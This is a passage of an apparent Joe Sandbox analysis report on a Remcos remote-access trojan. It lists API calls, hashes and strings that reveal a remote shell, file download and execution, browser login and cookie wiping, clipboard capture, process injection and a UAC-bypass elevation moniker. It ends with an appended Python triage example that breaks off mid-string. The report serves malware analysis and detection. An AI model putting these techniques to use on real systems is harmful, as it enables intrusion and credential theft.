                                              • Opcode Fuzzy Hash: b6ab1c5a61adf519dfdb67f66f61e91087094ad8cf8c24daf6457fb125bf4222
                                              • Instruction Fuzzy Hash: F00210B294016CAEDB20DB95CD85EEAB7BCEB09314F0044EBB549E2541E7389F84CF65
                                              APIs
                                              • SetEvent.KERNEL32(?,?), ref: 000C6F28
                                              • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 000C6FF8
                                              • DeleteFileW.KERNEL32(00000000), ref: 000C7018
                                                • Part of subcall function 000DB42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB489
                                                • Part of subcall function 000DB42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB4BB
                                                • Part of subcall function 000DB42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB50C
                                                • Part of subcall function 000DB42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB561
                                                • Part of subcall function 000DB42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB568
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                                • Part of subcall function 000C6BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00125454,?,?,00000000,000C7273,00000000,?,0000000A,00000000), ref: 000C6C38
                                                • Part of subcall function 000C6BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,000C7273,00000000,?,0000000A,00000000), ref: 000C6C80
                                                • Part of subcall function 000C6BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,000C7273,00000000,?,0000000A,00000000,00000000), ref: 000C6CC0
                                                • Part of subcall function 000C6BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 000C6CDD
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                                • Part of subcall function 000C4468: WaitForSingleObject.KERNEL32(?,00000000,LL,?,?,00000004,?,?,00000004,00133EE8,001345A8,00000000), ref: 000C450E
                                                • Part of subcall function 000C4468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00133EE8,001345A8,00000000,?,?,?,?,?,000D4CE9), ref: 000C453C
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 000C7416
                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 000C74F5
                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 000C773A
                                              • DeleteFileA.KERNEL32(?), ref: 000C78CC
                                                • Part of subcall function 000C7A8C: __EH_prolog.LIBCMT ref: 000C7A91
                                                • Part of subcall function 000C7A8C: FindFirstFileW.KERNEL32(00000000,?,00125AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C7B4A
                                                • Part of subcall function 000C7A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C7B6E
                                              • Sleep.KERNEL32(000007D0), ref: 000C7976
                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 000C79BA
                                                • Part of subcall function 000DBB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 000DBC6C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                              • API String ID: 2918587301-1507758755
                                              • Opcode ID: 53659638ebb1ce7a7528fe9910d0fbf9597484c7ae9dfac35ac978668b7fdfd0
                                              • Instruction ID: ad3fa86b58f67a47dae7d82f8947a74c15c0c22efbbefd05197ceccf1d972255
                                              • Opcode Fuzzy Hash: 53659638ebb1ce7a7528fe9910d0fbf9597484c7ae9dfac35ac978668b7fdfd0
                                              • Instruction Fuzzy Hash: 24426172608340ABC618F774C8A7FEE77A5AF92710F40491DF946972D3EF609A09C693
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 000C508E
                                                • Part of subcall function 000F34CF: EnterCriticalSection.KERNEL32(00130D18,00135D2C,?,000CAEAC,00135D2C,00116D97,?,00000000,00000000), ref: 000F34D9
                                                • Part of subcall function 000F34CF: LeaveCriticalSection.KERNEL32(00130D18,?,000CAEAC,00135D2C,00116D97,?,00000000,00000000), ref: 000F350C
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              • __Init_thread_footer.LIBCMT ref: 000C50CB
                                              • CreatePipe.KERNEL32(00135CEC,00135CD4,00135BF8,00000000,0012556C,00000000), ref: 000C515E
                                              • CreatePipe.KERNEL32(00135CD8,00135CF4,00135BF8,00000000), ref: 000C5174
                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00135C08,00135CDC), ref: 000C51E7
                                                • Part of subcall function 000F3519: EnterCriticalSection.KERNEL32(00130D18,?,00135D2C,?,000CAE8B,00135D2C,?,00000000,00000000), ref: 000F3524
                                                • Part of subcall function 000F3519: LeaveCriticalSection.KERNEL32(00130D18,?,000CAE8B,00135D2C,?,00000000,00000000), ref: 000F3561
                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 000C523F
                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 000C5264
                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 000C5291
                                                • Part of subcall function 000F38A5: __onexit.LIBCMT ref: 000F38AB
                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00133F98,00125570,00000062,00125554), ref: 000C538E
                                              • Sleep.KERNEL32(00000064,00000062,00125554), ref: 000C53A8
                                              • TerminateProcess.KERNEL32(00000000), ref: 000C53C1
                                              • CloseHandle.KERNEL32 ref: 000C53CD
                                              • CloseHandle.KERNEL32 ref: 000C53D5
                                              • CloseHandle.KERNEL32 ref: 000C53E7
                                              • CloseHandle.KERNEL32 ref: 000C53EF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                              • String ID: SystemDrive$cmd.exe
                                              • API String ID: 3815868655-3633465311
                                              • Opcode ID: cbf2d6aab6e3b30ad2e3cfacec53c7874fb4ac7be2242a92e815949c462e2ea8
                                              • Instruction ID: 1af27e34954c6db109e339a95ce818901a496ccd84e4f041f286b173cfe4345a
                                              • Opcode Fuzzy Hash: cbf2d6aab6e3b30ad2e3cfacec53c7874fb4ac7be2242a92e815949c462e2ea8
                                              • Instruction Fuzzy Hash: 1E911770604B04AFC704BB64ED41EAE77AEBB81B48F40042DF945A76A3DF349D858B61
                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 000D0F45
                                                • Part of subcall function 000D27D5: RegCreateKeyA.ADVAPI32(80000001,00000000,00125554), ref: 000D27E3
                                                • Part of subcall function 000D27D5: RegSetValueExA.KERNEL32(00125554,000000AF,00000000,00000004,00000001,00000004,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D27FE
                                                • Part of subcall function 000D27D5: RegCloseKey.ADVAPI32(00125554,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D2809
                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 000D0F81
                                              • CreateThread.KERNEL32(00000000,00000000,000D1637,00000000,00000000,00000000), ref: 000D0FE6
                                                • Part of subcall function 000D24B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 000D24D7
                                                • Part of subcall function 000D24B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,001342F8), ref: 000D24F5
                                                • Part of subcall function 000D24B7: RegCloseKey.KERNEL32(?), ref: 000D2500
                                              • CloseHandle.KERNEL32(00000000), ref: 000D0F90
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 000D125A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                              • API String ID: 65172268-13974260
                                              • Opcode ID: 095b95602a5f487d36c7fb500e9e1cde475fedff19da706807fc185fb2a05606
                                              • Instruction ID: d2b5f254d63ab15e8623f2659c8e3bbf8bfbfe0e7c4fad6625cbc5103253e1c0
                                              • Opcode Fuzzy Hash: 095b95602a5f487d36c7fb500e9e1cde475fedff19da706807fc185fb2a05606
                                              • Instruction Fuzzy Hash: 05718031608341A7C618F770DC57EEEB7A5AF92710F40452DB482922D3EF609A19C6A3
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 000CB3B4
                                              • FindClose.KERNEL32(00000000), ref: 000CB3CE
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 000CB4F1
                                              • FindClose.KERNEL32(00000000), ref: 000CB517
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFile$FirstNext
                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                              • API String ID: 1164774033-3681987949
                                              • Opcode ID: 7e5fb36bf324c8cfae97e5742e868225a8b7425e778b6db05a46611f9e170020
                                              • Instruction ID: eabb19978f2859caedb2db595c870e06261119a186ba0937004b66ed6d3648de
                                              • Opcode Fuzzy Hash: 7e5fb36bf324c8cfae97e5742e868225a8b7425e778b6db05a46611f9e170020
                                              • Instruction Fuzzy Hash: F1513E319045299BDB18FBB0DD56FED7779AF52310F40016DF806A21D3EF70AA8ACA54
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 000CB5B2
                                              • FindClose.KERNEL32(00000000), ref: 000CB5CC
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 000CB68C
                                              • FindClose.KERNEL32(00000000), ref: 000CB6B2
                                              • FindClose.KERNEL32(00000000), ref: 000CB6D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$Close$File$FirstNext
                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                              • API String ID: 3527384056-432212279
                                              • Opcode ID: daeca0702860bda2ef77ef08a621ae374cce09983122bbe014a2eaaa7ea96c44
                                              • Instruction ID: 86163a28a51dd394ca64d042c7ba9572dfd5fdd1608b419a57e9b52b4de19c78
                                              • Opcode Fuzzy Hash: daeca0702860bda2ef77ef08a621ae374cce09983122bbe014a2eaaa7ea96c44
                                              • Instruction Fuzzy Hash: 21415E319042299BCB14F7B4ED57EEE7779AF22310F40005DF806A31D3EF745A868A95
                                              APIs
                                              • OpenClipboard.USER32 ref: 000D59C7
                                              • EmptyClipboard.USER32 ref: 000D59D5
                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 000D59F5
                                              • GlobalLock.KERNEL32(00000000), ref: 000D59FE
                                              • GlobalUnlock.KERNEL32(00000000), ref: 000D5A34
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 000D5A3D
                                              • CloseClipboard.USER32 ref: 000D5A5A
                                              • OpenClipboard.USER32 ref: 000D5A61
                                              • GetClipboardData.USER32(0000000D), ref: 000D5A71
                                              • GlobalLock.KERNEL32(00000000), ref: 000D5A7A
                                              • GlobalUnlock.KERNEL32(00000000), ref: 000D5A83
                                              • CloseClipboard.USER32 ref: 000D5A89
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                              • String ID:
                                              • API String ID: 3520204547-0
                                              • Opcode ID: eed858fda5cff2ca45370d4a121a9d70161ffb83c2b095c42430eb99269e5a5f
                                              • Instruction ID: c295968ce42fb2f32b82678d40bbc5d472b14ceb46f4acf5c1db972af4408138
                                              • Opcode Fuzzy Hash: eed858fda5cff2ca45370d4a121a9d70161ffb83c2b095c42430eb99269e5a5f
                                              • Instruction Fuzzy Hash: B3215372604200ABD718BBB0DD5AEFE76B9AF91711F00491DF907C66D3EF3048459662
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00134358), ref: 000CE233
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00134358), ref: 000CE25E
                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 000CE27A
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 000CE2FD
                                              • CloseHandle.KERNEL32(00000000,?,?,00134358), ref: 000CE30C
                                                • Part of subcall function 000D27D5: RegCreateKeyA.ADVAPI32(80000001,00000000,00125554), ref: 000D27E3
                                                • Part of subcall function 000D27D5: RegSetValueExA.KERNEL32(00125554,000000AF,00000000,00000004,00000001,00000004,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D27FE
                                                • Part of subcall function 000D27D5: RegCloseKey.ADVAPI32(00125554,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D2809
                                              • CloseHandle.KERNEL32(00000000,?,?,00134358), ref: 000CE371
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                              • API String ID: 726551946-1743721670
                                              • Opcode ID: f9d61f03c2dcabf9a30f547f677fc70b8eefa047e8d464031981e59ae9714bc5
                                              • Instruction ID: 950cf40a39f0dd17f245485e04db0b6332614bbdec3541337d97c7866e7960e7
                                              • Opcode Fuzzy Hash: f9d61f03c2dcabf9a30f547f677fc70b8eefa047e8d464031981e59ae9714bc5
                                              • Instruction Fuzzy Hash: 81714E311083419BC724FB60D895FEE77E5AF96354F40492DF986931A3EF70AA09CB52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 0$1$2$3$4$5$6$7
                                              • API String ID: 0-3177665633
                                              • Opcode ID: 50336a84f7350e247a2bdcfc2750f8fcc74afebcde8b9c468fee64a34382d0fe
                                              • Instruction ID: 6ef98c49bea8b74b3368ee0740aeddcc40d9fb31ac5c09e84a7327678515198c
                                              • Opcode Fuzzy Hash: 50336a84f7350e247a2bdcfc2750f8fcc74afebcde8b9c468fee64a34382d0fe
                                              • Instruction Fuzzy Hash: 26612A74508341AEDB14EB20D862FEE77E4AF95750F44884DF995572E2DF309A08CB63
                                              APIs
                                              • _wcslen.LIBCMT ref: 000C6788
                                              • CoGetObject.OLE32(?,00000024,001259B0,00000000), ref: 000C67E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Object_wcslen
                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                              • API String ID: 240030777-3166923314
                                              • Opcode ID: e5778c71cb5c13cfc3a251249d5526c556f228b27c889bd4f2a860aecfb16c39
                                              • Instruction ID: 7a4ff175dcc803fd969e7ea25e6fbe4fb219aea64c53e741747273957a13fc40
                                              • Opcode Fuzzy Hash: e5778c71cb5c13cfc3a251249d5526c556f228b27c889bd4f2a860aecfb16c39
                                              • Instruction Fuzzy Hash: 9D1165B2900168AEDB14EBA4DD89FEEB7BCEB44710F54006DFA04F3181EB749A44CA75
                                              APIs
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,001348F8), ref: 000D98D8
                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 000D9927
                                              • GetLastError.KERNEL32 ref: 000D9935
                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 000D996D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                              • String ID:
                                              • API String ID: 3587775597-0
                                              • Opcode ID: c23134cae76e64939d9aac4b2e5081a9d98c8a29b79806041a1799c541d42aeb
                                              • Instruction ID: d9e357d4b7b8e15fb36f61bf18987a01ff2aca70d0f880ef365b36b642cb7849
                                              • Opcode Fuzzy Hash: c23134cae76e64939d9aac4b2e5081a9d98c8a29b79806041a1799c541d42aeb
                                              • Instruction Fuzzy Hash: 39810E71108304AFC314EB20DD95EEFB7A8BF95714F50491EF58696293EF70AA05CBA2
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB489
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB4BB
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB529
                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB536
                                                • Part of subcall function 000DB42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB50C
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB561
                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB568
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,001342E0,001342F8), ref: 000DB570
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB583
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                              • String ID:
                                              • API String ID: 2341273852-0
                                              • Opcode ID: 548f3c251fb268a7b92f44dd060c08830275ce9f80041165dddb113010fe313e
                                              • Instruction ID: 36cc5986d202baa2173ba36f99667a5f83395048be8d9363900a461155f085e9
                                              • Opcode Fuzzy Hash: 548f3c251fb268a7b92f44dd060c08830275ce9f80041165dddb113010fe313e
                                              • Instruction Fuzzy Hash: 46314F7180865CAACB24DBB0EC4DFEA77BCAF15300F440596F605D3695EB759BC9CA20
                                              APIs
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408E8A
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408E9A
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408EAA
                                              • LocalFree.KERNEL32(00000000,00408E51), ref: 00408EB1
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408EC1
                                              • CertFreeCertificateContext.CRYPT32(?,00408E51), ref: 00408ED1
                                              • CertFreeCertificateContext.CRYPT32(?,00408E51), ref: 00408EE5
                                              • CertCloseStore.CRYPT32(?,00000000,00408E51), ref: 00408EFA
                                              • CryptMsgClose.CRYPT32(?,00408E51), ref: 00408F0E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Free$Local$Cert$CertificateCloseContext$CryptStore
                                              • String ID:
                                              • API String ID: 340922021-0
                                              • Opcode ID: 98716ab120791c0f970d4b691cb4bbbbb3a86149c7f850876c4c0de7c4e8e56f
                                              • Instruction ID: 17655f6d4f9585b093950d62dd86047068d7cbd7ae94d3a07630a22f26ce11e3
                                              • Opcode Fuzzy Hash: 98716ab120791c0f970d4b691cb4bbbbb3a86149c7f850876c4c0de7c4e8e56f
                                              • Instruction Fuzzy Hash: A6019731E061A9DBCF216F60DE844EEB672BB42351F1805FAE149709A18B350FD1DF5A
                                              APIs
                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 000D301A
                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 000D3026
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 000D31ED
                                              • GetProcAddress.KERNEL32(00000000), ref: 000D31F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                              • API String ID: 2127411465-314212984
                                              • Opcode ID: 552b9b5c95ec1acb192b3ea4694053c940f4073e668df5bfd3c38c7762ec671d
                                              • Instruction ID: 8b6820f793c3e844fe841bd45b087c6c94f756a46fe19d10327b9f777860cf74
                                              • Opcode Fuzzy Hash: 552b9b5c95ec1acb192b3ea4694053c940f4073e668df5bfd3c38c7762ec671d
                                              • Instruction Fuzzy Hash: 12B1B672A043006BC618F774CC97EFE76A95F96714F400A5EF846932D3EF659B0582A3
                                              APIs
                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 000CB257
                                              • GetLastError.KERNEL32 ref: 000CB261
                                              Strings
                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 000CB222
                                              • [Chrome StoredLogins found, cleared!], xrefs: 000CB287
                                              • [Chrome StoredLogins not found], xrefs: 000CB27B
                                              • UserProfile, xrefs: 000CB227
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteErrorFileLast
                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                              • API String ID: 2018770650-1062637481
                                              • Opcode ID: 87f9688345691822408b81ddab6a89f43b23d76aca02a571097821d011e29d6e
                                              • Instruction ID: 68c31eca3cbd45b84089bffd0a5a00d0cade30bd34fb108bed89fe41a484a4eb
                                              • Opcode Fuzzy Hash: 87f9688345691822408b81ddab6a89f43b23d76aca02a571097821d011e29d6e
                                              • Instruction Fuzzy Hash: D1012D32A4410497CB4477B4ED6BEFE7738AF12710F40011DF402632D3FF615A558291
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 000D6AC4
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 000D6ACB
                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 000D6ADD
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 000D6AFC
                                              • GetLastError.KERNEL32 ref: 000D6B02
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                              • String ID: SeShutdownPrivilege
                                              • API String ID: 3534403312-3733053543
                                              • Opcode ID: a353a65cc900b71729c4d9d59696f207bd8a6f44974c8608f31d5d6c3a47b561
                                              • Instruction ID: b6e1a9904e36c9a1aa45097522a289c8470d8a3c081e10e08ecf40ed568927a9
                                              • Opcode Fuzzy Hash: a353a65cc900b71729c4d9d59696f207bd8a6f44974c8608f31d5d6c3a47b561
                                              • Instruction Fuzzy Hash: C3F0FE75805229BBDB109B91DD4DEEF7FBCEF05755F004050B806E2290D7745A44CBB1
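The listings above expose the sample's browser-store wiping (Firefox cookies.sqlite, Chrome Login Data), clipboard capture followed by send, process enumeration against the Internet Explorer injection targets, the CMSTPLUA elevation moniker passed to CoGetObject, the Shlwapi.dll/SHDeleteKeyW resolution and the SeShutdownPrivilege adjustment only as flat API sequences. The Python below is an added example for triaging listings in exactly this format; it is not part of the Joe Sandbox report and not code from Joe Security or from the sample. It parses each "APIs" block into a per-function call set plus its String ID values and applies behaviour rules keyed solely on the API names and strings visible above. The rule names, the regular expressions and the SAMPLE_REPORT excerpt (lines copied from the listings above, trimmed to the fields the parser reads) are this example's own choices and are assumptions, not Joe Sandbox conventions.

```python
"""Tag behaviours from Joe Sandbox per-function 'APIs' listings (added example, see lead-in)."""
import re
from dataclasses import dataclass, field

# Constructed excerpt: API and String ID lines copied from the listings above, one 'APIs' per function.
SAMPLE_REPORT = r"""
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 000CB5B2
• String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
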